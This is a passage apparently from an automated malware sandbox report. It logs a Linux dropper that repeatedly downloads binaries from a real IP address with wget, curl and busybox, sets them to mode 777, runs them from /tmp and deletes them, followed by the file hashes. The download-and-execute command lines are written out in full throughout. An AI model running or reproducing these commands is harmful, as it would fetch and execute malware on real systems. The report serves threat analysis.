/bin/rmrm 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:932
-
-
/bin/chmodchmod 777 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA./4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:938
-
-
/bin/chmodchmod 777 fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL./fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:944
-
-
/bin/chmodchmod 777 G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp./G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:950
-
-
/bin/chmodchmod 777 Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN./Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:956
-
-
/bin/chmodchmod 777 ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z./ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:962
-
-
/bin/chmodchmod 777 AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs./AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:968
-
-
/bin/chmodchmod 777 djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003./djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:971
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97